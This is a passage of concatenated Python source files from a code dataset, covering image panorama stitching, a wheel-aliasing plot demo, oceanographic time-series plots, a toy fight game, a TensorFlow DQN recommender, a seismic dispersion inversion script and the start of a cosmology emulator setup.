= argparse.ArgumentParser('Generalised Mosaicing')\n PARSE.add_argument('dir', type=str, default='../data/general/mountain/')\n PARSE.add_argument('ref_idx', type=int)\n ARGS = PARSE.parse_args()\n IMAGES = []\n for _, _, file_ in os.walk(ARGS.dir):\n file_.sort()\n for f in file_:\n image_path = ARGS.dir+'{}'.format(f)\n # print(image_path)\n 
IMAGES.append(cv2.imread(image_path))\n # print(len(IMAGES))\n print('---Generating Panorama. Please wait !!!---')\n OUTPUT = generalised_mosaic(IMAGES, ARGS.ref_idx)\n\n # Crop the image to remove as much black border as possible\n GRAY = cv2.cvtColor(OUTPUT, cv2.COLOR_BGR2GRAY)\n _, THRESH = cv2.threshold(GRAY, 1, 255, cv2.THRESH_BINARY)\n CONTOURS, _ = cv2.findContours(THRESH, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n CNT = CONTOURS[0]\n X, Y, W, H = cv2.boundingRect(CNT)\n CROP = OUTPUT[Y:Y+H, X:X+W]\n # print(ARGS.dir.split('/'))\n WRITE_PATH = '../results/pano-general-results/{}'\\\n .format(ARGS.dir.split('/')[-2])+'.png'\n # print(WRITE_PATH)\n cv2.imwrite(WRITE_PATH, CROP)\n cv2.namedWindow('RESULT', cv2.WINDOW_NORMAL)\n cv2.imshow('RESULT', CROP)\n cv2.waitKey(0)\n","sub_path":"midsem/130010009_140076001_150050001_lab03_midsem/code/pano-general.py","file_name":"pano-general.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23772124","text":"from __future__ import division\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef draw_wheel(spokes, angle):\n '''\n Draws a wheel in a pyplot with the number of spokes determined by \"spokes\".\n '''\n # Draw outer circle\n N = 200\n t = np.linspace(0, N, num=N + 1) * 2 * np.pi / N \n wheel_width = 10\n ax.plot(np.cos(t), np.sin(t), 'k', linewidth=wheel_width)\n\n # Spokes - calculate angle and draw them individually\n spoke_angle = 2*np.pi / spokes\n spoke_width = 3\n \n for i in range(1, spokes + 1):\n x = np.concatenate((np.array([0]), np.array([np.cos(angle+(i-1)*spoke_angle)])), axis=0)\n y = np.concatenate((np.array([0]), np.array([-np.sin(angle+(i-1)*spoke_angle)])), axis=0)\n ax.plot(x, y, 'k', linewidth=spoke_width)\n fig.canvas.draw() # update the line\n \n fig.canvas.flush_events() # makes it look like it's spinning by updating the figure\n return 1\n \nif __name__ == '__main__':\n # Parameters\n seconds = 2\n frame_rate = 10\n spokes = 5\n angular_velocity = 0.5 * np.pi\n \n # Create the plot\n plt.ion()\n d_angle = angular_velocity / frame_rate\n fig = plt.figure()\n ax = fig.add_subplot(111, aspect='equal')\n \n # Go through frames\n for cur_frame in range(1, int(np.ceil(seconds * frame_rate))):\n plt.cla()\n draw_wheel(spokes, d_angle*(cur_frame - 1))\n plt.show()\n","sub_path":"Exercises/4/Solution/wheel_aliasing.py","file_name":"wheel_aliasing.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323256517","text":"# monthly averaged stack diagram\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport argparse\nfrom datetime import datetime\nfrom datetime import timedelta\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.dates as mdates # for month ticks\n\n# for debugging\ndef print_full(x):\n pd.set_option('display.max_rows', len(x))\n print(x)\n pd.reset_option('display.max_rows')\n\nout_fn = '../../../THESIS/figures/results/'\nout_data = str(input('Data being processed? 
(on/off): '))\n\n#############\n# __SETUP__ #\n#############\n\nparser = argparse.ArgumentParser(description=__doc__)\n# add a positional writable file argument\nparser.add_argument('input_csv_file', type=argparse.FileType('r'))\n# parser.add_argument('output_csv_file', type=argparse.FileType('w')) \nargs = parser.parse_args()\n\n############\n# __DATA__ #\n############\n\n# Read in stack data\ndata = pd.read_csv(args.input_csv_file, parse_dates = ['xtime'], \n infer_datetime_format = True) #Read as DateTime obsject\ndata['xyear'] = [x.year for x in data['xtime']]\ndata['xday'] = [x.day for x in data['xtime']]\n#data['DoY'] = [x.timetuple().tm_yday for x in data['xtime']]\ndata = data.drop_duplicates('xtime').reset_index(drop=True)\ndata = data.sort_values('xtime').reset_index(drop=True)\n\n# group data\ndata2 = data.groupby(['xyear', 'xmonth']).mean().reset_index()\ndata2['xtime'] = [datetime(int(x[1]['xyear']), int(x[1]['xmonth']), 1, 0, 0, 0) for x in data2.iterrows()]\n\ndata3 = data2.groupby(['xyear']).mean().reset_index()\ndata3['xtime'] = [datetime(int(x[1]['xyear']), 1, 1, 0, 0, 0) for x in data3.iterrows()]\n\n# Seasonal data\ndata4 = data[data.xyear != 2016]\ndata4 = data.groupby(['xmonth', 'xday']).mean().reset_index()\ndata4_std = data.groupby(['xmonth', 'xday']).std().reset_index()\n# add seasonal first half vs second half\ndata4a = data[data.xyear != 2016]\ndata4a = data4a.set_index(['xtime'])\ndata4b = data4a\ndata4a = data4a.loc['1994-1-1':'1999-12-31']\ndata4b = data4b.loc['2010-1-1':'2015-12-31']\ndata4a = data4a.groupby(['xmonth', 'xday']).mean().reset_index()\ndata4b = data4b.groupby(['xmonth', 'xday']).mean().reset_index()\n\n# % of year above 50% EAC dominance\ndata['dom'] = [1 if x > 0.5 else 0 for x in data['yEACr']]\ndata5 = data.groupby(['xyear', 'dom']).count()\ndom1 = list(data5['yEAC'][1::2])\ndom0 = list(data5['yEAC'][::2])\ndomtot = [x + y for x, y in zip(dom1, dom0)]\ndom = [x/y for x, y in zip(dom1, domtot)]\ndom[-1] = np.nan\ndata5 = {'dom':dom, 'year':list(range(1994,2017,1))}\ndata5 = pd.DataFrame(data=data5)\n\n############\n# __PLOT__ #\n############\n\n# # __normal_plot__\n# fig, ax = plt.subplots(figsize=(20, 3))\n# ax.stackplot(list(data['xtime']), list(data['yTSWr']), list(data['yEACr']))\n# plt.title('EAC Influence (daily)')\n# plt.show()\n# plt.close(\"all\")\n\n# # __Monthly_plot__\n# fig, ax = plt.subplots(figsize=(20, 3))\n# ax.stackplot(list(data2['xtime']), list(data2['yTSWr']), list(data2['yEACr']))\n# plt.title('EAC Influence (monthly)')\n# plt.show()\n# plt.close(\"all\")\n\n# # __yearly_means_plot__\n# # v1\n# fig, ax = plt.subplots()\n# ax.stackplot(list(data3['xtime']), list(data3['yTSWr']), list(data3['yEACr']))\n# plt.title('EAC Influence (yearly)')\n# plt.show()\n# plt.close(\"all\")\n# # v2\n# p1 = plt.bar(list(data3['xyear']), list(data3['yTSWr']), 1)\n# p2 = plt.bar(list(data3['xyear']), list(data3['yEACr']), 1, bottom=list(data3['yTSWr']))\n# plt.ylabel('Relative Influence')\n# plt.xlabel('Year')\n# plt.yticks(np.arange(0, 1.1, 0.1))\n# plt.xticks(np.arange(1994, 2017, 2))\n# plt.title('EAC Influence (yearly)')\n# plt.legend((p1[0], p2[0]), ('non-EAC', 'EAC'))\n# plt.show()\n\n# # __Seasonal_Plot__\n# fig, ax = plt.subplots()\n# ax.stackplot(list(data4.index), list(data4['yTSWr']), list(data4['yEACr']))\n# plt.title('Mean Seasonal EAC Influence')\n# plt.show()\n# plt.close(\"all\")\n\n# __Monthly_plot__\nfig, ax = plt.subplots(figsize=(20, 3))\nplt.grid(ls='dashed', alpha=0.7)\nx = list(range(0,len(data2.xtime)))\nx = [i/12 + 
1994 for i in x]\ndata2['x'] = x\nax.stackplot(list(data2['x']), list(data2['yEACr']), color='#808080')\nax.set(xticks=list(range(1994,2017,2)))\nax.set_xlim(1994,2017)\nplt.ylabel('EAC Fraction', labelpad=16, size=14)\nplt.show()\nfig.savefig(out_fn + 'monthly_' + out_data + '.png')\nplt.close(\"all\")\n\n\n# # __Dominance_plot__\n# # with sns.axes_style(\"darkgrid\"):\n# fig, ax = plt.subplots(figsize=(20, 2))\n# plt.grid(ls='dashed', alpha=0.7)\n# plt.plot(data5.year, data5.dom, color='#606060', alpha=1, marker='+')\n# ax = sns.regplot(x='year', y=\"dom\", data=data5, color='b', marker=\"+\", \n# \t\t\t\t\tline_kws={'alpha':0.4}, scatter_kws={'alpha':0}, ci=95)\n# plt.ylabel('EAC Dominance', labelpad=16, size=14)\n# plt.xlabel('')\n# plt.xticks(np.arange(1994, 2017, step=2))\n# ax.set_xlim(1994,2017)\n# plt.yticks(np.arange(0.2, 0.8, step=0.2))\n# ax.set_ylim(0.1,0.7)\n# plt.show()\n# fig.savefig(out_fn + 'dom_' + out_data + '.png')\n# plt.close(\"all\")\n\n# __yearly_means_plot__\nfig, ax = plt.subplots(figsize=(20, 2))\nax.set(xticks=list(range(1994,2017,2)))\nax.set_xlim(1994, 2017)\nax = sns.regplot(x='xyear', y=\"yEACr\", data=data3, color='b', line_kws={'alpha':0.4}, scatter_kws={'alpha':0}, ci=95, truncate=True)\nax.set_ylabel('EAC Fraction', labelpad=16, size=14)\nplt.grid(ls='dashed', alpha=0.7)\nplt.plot('xyear', 'yEACr', data=data3, color='#606060', marker='+', alpha=1)\nplt.yticks(np.arange(0.2, 0.8, step=0.2))\nax.set_ylim(0.1,0.9)\nplt.show()\nfig.savefig(out_fn + 'year_' + out_data + '.png')\nplt.close(\"all\")\n\n\n# make time ticks\nindex = data4.index\nbase = datetime(2000, 1, 1, 0, 0, 0)\nindex = [base + timedelta(int(x)) for x in index]\n# Set the locator\nlocator = mdates.MonthLocator() # every month\n# Specify the format - %b gives us Jan, Feb...\nfmt = mdates.DateFormatter('%b')\n\n# __Seasonal_plot__\nif out_data == 'off':\n\ttitle = 'Offshore Zone'\nif out_data == 'on':\n\ttitle = 'Coastal Zone'\nfig, ax = plt.subplots(figsize=(20, 3))\nplt.grid(ls='dashed', alpha=0.7)\nax.stackplot(index, list(data4['yEACr']), color='#606060')\nub, lb = data4['yEACr']+data4_std['yEACr'], data4['yEACr']-data4_std['yEACr'] \nub = [1 if x >= 1 else x for x in ub]\nlb = [0 if x <= 0 else x for x in lb]\nplt.fill_between(index, lb, ub, alpha=0.25, color='#4682B4')\n# plt.plot(index, ub, '--', color='k', alpha=0.1)\n# plt.plot(index, lb, '--', color='k', alpha=0.1)\nplt.plot(index, data4a.yEACr, '--', color='b', alpha=0.6)\nplt.plot(index, data4b.yEACr, '--', color='r', alpha=0.6)\nplt.ylabel('EAC Fraction', labelpad=16, size = 14)\nplt.title(title, size=15)\nX = plt.gca().xaxis\nX.set_major_locator(locator)\nX.set_major_formatter(fmt)\nax.set_xlim(datetime(2000, 1, 1),datetime(2000, 12, 31))\n# ax.spines['right'].set_visible(False)\n# ax.spines['top'].set_visible(False)\nplt.show()\nfig.savefig(out_fn + 'season_' + out_data + '.png')\nplt.close(\"all\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"temporal_plots/temporal_plots-v3.py","file_name":"temporal_plots-v3.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"334057492","text":"\n#定义fight函数实现游戏逻辑\ndef fight():\n #定义4个变量存放数据\n my_hp = 1000\n my_power = 200\n enemy_hp = 1000\n enemy_power = 200\n\n #加入循环,让游戏可以进行多轮\n while True:\n my_hp = my_hp - enemy_power\n enemy_hp = enemy_hp - my_power\n\n print(my_hp)\n\n #判断谁的血量小于等于0\n if my_hp <=0:\n print(\"我输了\")\n #满足条件跳出循环\n break\n elif enemy_hp <=0:\n print(\"我赢了\")\n 
break\nfight()\n","sub_path":"python_practice/game/gene_round3.py","file_name":"gene_round3.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"397156495","text":"# -----------------------------------------------\n# -*- encoding=utf-8 -*- #\n# __author__:'焉知飞鱼' #\n# CreateTime: #\n# 2021/4/21 10:23 #\n# #\n# 天下风云出我辈, #\n# 一入江湖岁月催。 #\n# 皇图霸业谈笑中, #\n# 不胜人生一场醉。 #\n# -----------------------------------------------\nimport tensorflow as tf\nimport numpy as np\nfrom collections import deque\nfrom itertools import chain\nimport os\n\n\nclass DQN():\n def __init__(self, env, args):\n self.env = env\n self.f_dim = env.f_dim\n self.type = args.dqn_type\n self.pw_dim = args.pw_dim\n self.k = args.k\n self.model_path = args.model_path\n self.std = args.q_std\n self.hidden_dims = args.dqn_dims\n self.lr = args.dqn_lr\n self.l2_reg = args.l2_reg\n self.drop_keep_rate = args.drop_keep_rate\n self.min_value = args.min_value\n self.band_size = args.pw_band_size\n self.placeholder = {}\n\n # self.sess=tf.compat.v1.InteractiveSession()\n self.sess = self._init_session()\n self.global_step = tf.compat.v1.train.get_or_create_global_step() # trainable=False\n self._init()\n self.sess.run(tf.global_variables_initializer())\n self.saver = tf.compat.v1.train.Saver()\n self.agg_variables = tf.compat.v1.trainable_variables()\n\n def _init_session(self):\n # config = tf.ConfigProto(device_count={\"gpu\": 0})\n # config.gpu_options.allow_growth = True\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)\n config = tf.ConfigProto(gpu_options=gpu_options)\n return tf.Session(config=config)\n\n def _init(self):\n if not os.path.exists(self.model_path):\n os.makedirs(self.model_path)\n\n self.construct_placeholder()\n self.construct_Q_and_loss()\n self.construct_max_Q()\n\n def construct_placeholder(self):\n # max Q placeholder 这里定义argmax Q 和 max_Q\n self.placeholder['all_action_user_indices'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n self.placeholder['all_action_tensor_indices'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None, 2])\n # 行当前batch的用户数,列为当前batch的用户中可选的action最大的数目。\n self.placeholder['all_action_tensor_shape'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[2])\n\n # action_cnt = np.cumsum(action_cnt)\n # action_cnt = [0] + list(action_cnt[:-1])\n # 当前用户之前的用户所有的可选的action的数量\n self.placeholder['action_count'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n # action_space_cnt[uu] = len(action_space)\n self.placeholder['action_space_count'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n\n # online版本:建议直接把all_action_feature_gather作为placeholder,输入所有可以选的items的features\n self.placeholder['all_action_id'] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n\n # ----------------------------Q and loss placeholder\n # 这里定义Q function还有对应的loss。定义的时候,假设同时处理一个batch的数据,所以稍微复杂一点。\n # 输出_k个Q function,_k个loss,_k个train op\n self.placeholder['current_action_space'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.f_dim])\n self.placeholder['action_space_mean'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.f_dim])\n self.placeholder['action_space_std'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.f_dim])\n self.placeholder['y_label'] = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None])\n\n def mlp(self, x, hidden_dims, output_dim, activation, sd, act_last=False, keep_prob=1.0):\n hidden_dims = tuple(map(int, 
hidden_dims.split('-')))\n for h in hidden_dims:\n x = tf.layers.dense(x, h, activation=activation, trainable=True,\n kernel_initializer=tf.variance_scaling_initializer(scale=1.0, mode='fan_in',\n distribution='truncated_normal'))\n x = tf.nn.dropout(x, rate=1 - keep_prob)\n\n if act_last:\n return tf.layers.dense(x, output_dim, activation=activation, trainable=True,\n kernel_initializer=tf.variance_scaling_initializer(scale=1.0, mode='fan_in',\n distribution='truncated_normal'))\n else:\n return tf.layers.dense(x, output_dim, trainable=True,\n kernel_initializer=tf.truncated_normal_initializer(stddev=sd))\n\n # 这里定义Q function还有对应的loss。定义的时候,假设同时处理一个batch的数据,所以稍微复杂一点。\n # 输出_k个Q function,_k个loss,_k个train op,相当于是DQN的前向网络\n def construct_Q_and_loss(self):\n # (1) action states - offline的实验受到数据的限制,所以加了一个mean和std。\n # 做online实验没有数据的限制,我觉得这部分的input可以直接不要\n if self.type == 'offline':\n self.action_state = tf.concat([self.placeholder['action_space_mean'], self.placeholder['action_space_std']],\n axis=1)\n\n # (2) action id - 推荐的items的id。online的版本可以直接输入feature vector而不是id。\n # 换言之,可以忽略action_k_id,直接把(3)的action_k_feature_gather定义成placeholder,输入item features。\n # action_k_id = [[] for _ in range(self.k)]\n action_k_id = ['action_k_{}'.format(i) for i in np.arange(self.k)]\n for ii in range(self.k):\n self.placeholder[action_k_id[ii]] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n action_k_feature_gather = [[] for _ in range(self.k)]\n for ii in range(self.k):\n # action_k_feature_gather[ii] 代表推荐的第ii个item的feature。(总共推荐_k个item)\n action_k_feature_gather[ii] = tf.gather(self.placeholder['current_action_space'],\n self.placeholder[action_k_id[ii]])\n\n # 定义Q: input:(user_states, action_states, action_feature)\n concate_input_k = [[] for _ in range(self.k)]\n action_feature_list = []\n q_value_k = [[] for _ in range(self.k)]\n self.loss_k = [[] for _ in range(self.k)]\n opt_k = [[] for _ in range(self.k)]\n train_variable_k = [[] for _ in range(self.k)]\n self.train_op_k = [[] for _ in range(self.k)]\n\n for ii in range(self.k):\n # 把(user_states, action_states, action_feature)三种vectors concat在一起,作为input。(online版本可以忽略action_states)\n # 注意:action_feature_list 是一步步变大的,从length=1到self.k\n action_feature_list.append(action_k_feature_gather[ii])\n action_feature_list_ = tf.concat(action_feature_list, axis=1)\n concate_input_k[ii] = tf.concat([self.env.user_states, self.action_state, action_feature_list_], axis=1)\n concate_input_k[ii] = tf.reshape(concate_input_k[ii], [-1,\n self.pw_dim * self.f_dim + 2 * self.f_dim + int(\n ii + 1) * self.f_dim])\n\n current_variables = tf.compat.v1.trainable_variables()\n # q_value_k[ii]: 构造paper里面提到的Q^j, where j=1,...,_k\n with tf.variable_scope('Q' + str(ii) + '-function', reuse=False):\n q_value_k[ii] = self.mlp(concate_input_k[ii], self.hidden_dims, 1, tf.nn.elu, sd=self.std,\n act_last=False, keep_prob=self.drop_keep_rate)\n\n q_value_k[ii] = tf.reshape(q_value_k[ii], [-1])\n\n # loss\n # y_label为reward\n ##y_label就是env算出来的reward,每个用户的reward,segment_sum操作了\n self.loss_k[ii] = tf.reduce_mean(tf.squared_difference(q_value_k[ii], self.placeholder['y_label'])) #\n # opt_k[ii] = tf.compat.v1.train.AdamOptimizer(learning_rate=self.lr)\n opt_k[ii] = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=self.lr)\n\n train_variable_k[ii] = list(set(tf.compat.v1.trainable_variables()) - set(current_variables))\n l2_loss_k = tf.add_n(\n [tf.nn.l2_loss(v) for v in train_variable_k[ii] if 'bias' not in v.name]) * self.l2_reg\n\n self.train_op_k[ii] = 
opt_k[ii].minimize(self.loss_k[ii] + l2_loss_k, var_list=train_variable_k[ii],\n global_step=self.global_step)\n\n # self.sess.run(tf.variables_initializer(list(set(tf.global_variables())-set(agg_variables))))\n\n self.q_feed_dict = {self.placeholder['current_action_space']: [], self.placeholder['action_space_mean']: [],\n self.placeholder['action_space_std']: [], self.env.placeholder['Xs_clicked']: [],\n self.env.placeholder['history_order_indices']: [],\n self.env.placeholder['history_user_indices']: [],\n self.placeholder['y_label']: []}\n\n # return q_feed_dict,loss_k,train_op_k\n\n else: # online\n action_k_feature_gather = ['action_k_feature_gather:{}'.format(i) for i in np.arange(self.k)]\n for ii in range(self.k):\n self.placeholder[action_k_feature_gather[ii]] = tf.compat.v1.placeholder(dtype=tf.int64, shape=[None])\n\n # 定义Q: input:(user_states, action_states, action_feature)\n concate_input_k = [[] for _ in range(self.k)]\n action_feature_list = []\n q_value_k = [[] for _ in range(self.k)]\n self.loss_k = [[] for _ in range(self.k)]\n opt_k = [[] for _ in range(self.k)]\n train_variable_k = [[] for _ in range(self.k)]\n self.train_op_k = [[] for _ in range(self.k)]\n\n for ii in range(self.k):\n # 把(user_states, action_states, action_feature)三种vectors concat在一起,作为input。(online版本可以忽略action_states)\n # 注意:action_feature_list 是一步步变大的,从length=1到self.k\n action_feature_list.append(self.placeholder[action_k_feature_gather[ii]])\n action_feature_list_ = tf.concat(action_feature_list, axis=1)\n concate_input_k[ii] = tf.concat([self.env.user_states, self.action_state, action_feature_list_], axis=1)\n concate_input_k[ii] = tf.concat([self.env.user_states, action_feature_list], axis=1)\n concate_input_k[ii] = tf.reshape(concate_input_k[ii],\n [-1, self.pw_dim * self.f_dim + int(ii + 1) * self.f_dim])\n\n current_variables = tf.trainable_variables()\n # q_value_k[ii]: 构造paper里面提到的Q^j, where j=1,...,_k\n with tf.variable_scope('Q' + str(ii) + '-function', reuse=False):\n q_value_k[ii] = self.mlp(concate_input_k[ii], self.hidden_dims, 1, tf.nn.elu, sd=self.std,\n act_last=False, keep_prob=self.drop_keep_rate)\n\n q_value_k[ii] = tf.reshape(q_value_k[ii], [-1])\n\n # loss\n # y_label为reward\n ##y_label就是env算出来的reward,每个用户的reward,segment_sum操作了\n self.loss_k[ii] = tf.reduce_mean(tf.squared_difference(q_value_k[ii], self.placeholder['y_label']))\n opt_k[ii] = tf.train.AdamOptimizer(learning_rate=self.lr)\n\n train_variable_k[ii] = list(set(tf.trainable_variables()) - set(current_variables))\n l2_loss_k = tf.add_n(\n [tf.nn.l2_loss(v) for v in train_variable_k[ii] if 'bias' not in v.name]) * self.l2_reg\n\n self.train_op_k[ii] = opt_k[ii].minimize(self.loss_k[ii] + l2_loss_k, var_list=train_variable_k[ii],\n global_step=self.global_step)\n\n # self.sess.run(tf.variables_initializer(list(set(tf.global_variables())-set(agg_variables))))\n\n q_feed_dict = {self.placeholder['current_action_space']: [], self.placeholder['action_space_mean']: [],\n self.placeholder['action_space_std']: [], self.env.placeholder['Xs_clicked']: [],\n self.env.placeholder['history_order_indices']: [],\n self.env.placeholder['history_user_indices']: [],\n self.placeholder['y_label']: []}\n\n for ii in range(self.k):\n self.placeholder[action_k_feature_gather[ii]] = []\n\n # return q_feed_dict,loss_k,train_op_k\n\n # 这里定义argmax Q 和 max_Q 其实就是prediction\n def construct_max_Q(self):\n if self.type == 'offline':\n # online版本:建议直接把all_action_feature_gather作为placeholder,输入所有可以选的items的features\n # current_action_space:action_space 
+= feature_space[user]\n all_action_feature_gather = tf.gather(self.placeholder['current_action_space'],\n self.placeholder['all_action_id'])\n user_states_scatter = tf.gather(self.env.user_states, self.placeholder['all_action_user_indices'])\n # Online version: suggestion: the action states can be omitted\n action_states_scatter = tf.gather(self.action_state, self.placeholder['all_action_user_indices'])\n\n max_action_feature_list = []\n max_action_k = [[] for _ in range(self.k)]\n max_action_feature_k = [[] for _ in range(self.k)]\n to_avoid_repeat_tensor = tf.zeros(tf.cast(self.placeholder['all_action_tensor_shape'], tf.int32))\n\n max_q_value = []\n for ii in range(self.k):\n # Build the input of Q_j (notation: j is ii here)\n # Note: max_action_feature_list grows step by step, from length=0 to length=_k - 1\n if ii == 0:\n concate_input = tf.concat([user_states_scatter, action_states_scatter, all_action_feature_gather],\n axis=1)\n else:\n max_action_feature_list_ = tf.concat(max_action_feature_list, axis=1)\n concate_input = tf.concat([user_states_scatter, action_states_scatter, max_action_feature_list_,\n all_action_feature_gather], axis=1)\n concate_input = tf.reshape(concate_input,\n [-1, self.pw_dim * self.f_dim + 2 * self.f_dim + self.f_dim * int(ii + 1)])\n # Compute the Q_j values of all actions (all items)\n # Note: Q_j must reuse the Q_j defined in construct_Q_and_loss\n with tf.variable_scope('Q' + str(ii) + '-function', reuse=True):\n q_value_all = self.mlp(concate_input, self.hidden_dims, 1, tf.nn.elu, sd=self.std, act_last=False,\n keep_prob=self.drop_keep_rate)\n\n q_value_all = tf.reshape(q_value_all, [-1])\n # tf.sparse_to_dense is deprecated. Create a sparse tensor with tf.sparse.SparseTensor, then use tf.sparse.to_dense\n q1_tensor = tf.sparse_to_dense(self.placeholder['all_action_tensor_indices'],\n self.placeholder['all_action_tensor_shape'], q_value_all,\n default_value=self.min_value)\n q1_tensor += to_avoid_repeat_tensor\n\n # max_action_k[ii]: the item with the best Q_j value, used as the j-th recommended item\n max_action_k[ii] = tf.argmax(q1_tensor, axis=1)\n # to_avoid_repeat_tensor prevents recommending the same item again, since we want _k distinct items.\n to_avoid_repeat_tensor += tf.one_hot(max_action_k[ii],\n tf.cast(self.placeholder['all_action_tensor_shape'][1], tf.int32),\n on_value=self.min_value, off_value=0.0)\n # The following lines map max_action_k[ii] back to the real item id. How to write this part depends on the format of your own experiment data.\n # The running total of selectable actions of all previous users up to the current user, excluding the current user's count\n # action_count\n max_action_k[ii] = tf.add(max_action_k[ii], self.placeholder['action_count'])\n # action_id += action_id_u gives the all_action_id below\n max_action_k[ii] = tf.gather(self.placeholder['all_action_id'], max_action_k[ii])\n max_action_feature_k[ii] = tf.gather(self.placeholder['current_action_space'], max_action_k[ii])\n max_action_k[ii] = max_action_k[ii] - self.placeholder['action_space_count']\n\n # Store the features of the best item from argmax Q_j as part of the input of the next Q_{j+1}\n max_action_feature_k_scatter = tf.gather(max_action_feature_k[ii],\n self.placeholder['all_action_user_indices'])\n max_action_feature_list.append(max_action_feature_k_scatter)\n\n max_q_val_k = tf.math.segment_max(q_value_all, self.placeholder['all_action_user_indices'])\n max_q_value.append(max_q_val_k)\n\n # self.max_q_value = tf.math.reduce_max(max_q_value,axis=0)\n self.max_q_value = tf.math.segment_max(q_value_all, self.placeholder['all_action_user_indices'])\n\n self.max_action = tf.stack(max_action_k, axis=1)\n max_action_disp_features = tf.concat(max_action_feature_k, axis=1)\n self.max_action_disp_features = tf.reshape(max_action_disp_features, [-1, self.f_dim])\n\n max_q_feed_dict = {self.placeholder['all_action_id']: [], self.placeholder['all_action_user_indices']: [],\n 
self.placeholder['all_action_tensor_indices']: [],\n self.placeholder['all_action_tensor_shape']: [],\n self.placeholder['current_action_space']: [], self.env.placeholder['Xs_clicked']: [],\n self.env.placeholder['history_order_indices']: [],\n self.env.placeholder['history_user_indices']: [],\n self.placeholder['action_count']: [], self.placeholder['action_space_count']: [],\n self.placeholder['action_space_mean']: [], self.placeholder['action_space_std']: []}\n\n # return max_q_value,max_action,max_action_disp_features,max_q_feed_dict\n\n def train_on_batch(self, q_feed_dict):\n _, loss_k, step = self.sess.run([self.train_op_k, self.loss_k, self.global_step], feed_dict=q_feed_dict)\n return loss_k, step\n\n def save(self, model_name):\n save_path = os.path.join(self.model_path, model_name)\n self.saver.save(self.sess, save_path)\n print('model:{} saved successfully!'.format(save_path))\n\n def restore(self, model_name):\n best_save_path = os.path.join(self.model_path, model_name)\n self.saver.restore(self.sess, best_save_path)\n print('model:{} loaded successfully!'.format(best_save_path))\n\n def choose_action(self, max_q_feed_dict):\n max_action, max_action_disp_feature = self.sess.run([self.max_action, self.max_action_disp_features],\n feed_dict=max_q_feed_dict)\n return max_action, max_action_disp_feature\n\n def get_max_q_value(self, max_q_feed_dict):\n max_q_value = self.sess.run(self.max_q_value, feed_dict=max_q_feed_dict)\n return max_q_value\n","sub_path":"GAN_RL/yjp/code/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":20767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344665916","text":"#encoding: utf-8\n#!/bin/python2.7\n\nimport numpy as np\n\nimport forward1D as dsp\nimport inversion as inv\nimport matplotlib.pyplot as plt\n\n# >> TRUE MODEL \nzt = np.array([5., 5., 5.])\nvs = np.array([300., 500., 750., 1000.])\nnu = np.array([0.33, 0.33, 0.33, 0.33])\nro = np.array([1200., 1200., 1200., 1200.])\n\n# >> FREQUENCY PARAMETERS\nwmin = 10.\nwmax = 90.\nnw = int(wmax-wmin)+1\n\n# >> GPDC\ncurve = dsp.fgpdc(zt, vs, nu, ro, wmin, wmax, nw)\n\n# >> PRIOR MODEL PHYSICAL PARAMETERS\nvs0 = np.array([450., 650., 950., 1250.])\nnu0 = np.array([0.33, 0.33, 0.33, 0.33])\nro0 = np.array([1200.,1200., 1200., 1200.])\nzl0 = np.array([4., 8., 3.])\n\n# >> UNCERTAINTIES\nudisp = np.zeros((nw), dtype=np.float32)\nudv = np.zeros((vs0.shape), dtype=np.float32)\nudz = np.zeros((zl0.shape), dtype=np.float32)\nudisp[:] = 50 #10. 
#np.sum(disptr)/float(nv*nw)\nudv[:] = 100.\nudz[:] = 0.5\n\n# >> INVERSION\nalp = 0.5\nnit = 20\nivs, izl = inv.l2inv(vs, nu, ro, zt, curve[:,1], udisp, vs0, nu0, ro0, zl0, udv, udz, alp, nit, wmin, wmax, nw) \n","sub_path":"DIKES/script/L2_launch_save.py","file_name":"L2_launch_save.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"451601221","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 15 15:05:22 2020\n\n@author: raphaelbaena\n\"\"\"\n\nimport numpy as np\n\n\n\nfrom looti import datahandle as dhl\nfrom looti import automatic_validation as av\n#sns.set()\n\ndatafile_ext = \"Massive_Nus\"\ndatafile_LCDM = \"Massive_Nus_LCDM\"\noutputfolder = \"./data/\"\n\nemulation_data = dhl.DataHandle( datafile_ext, outputfolder,datafile_LCDM, \n num_parameters=3)\n \n\nemulation_data.read_csv_pandas(verbosity=2)\n\n\nemulation_data.calculate_ratio_by_redshifts(emulation_data.z_vals, normalize=True)\n\nlinkgrid = emulation_data.lin_k_grid\nmask = [k for k in np.where(linkgrid <10)[0] if k in np.where(linkgrid >0.1)[0]]\nGLOBAL_applymask = True\n\n\nthinning = 1\nmin_ntrain = 70\nmax_ntrain = 71\nwanted_ntest = 30\nPCA_dict_cross,PCA_dict_cros_all = 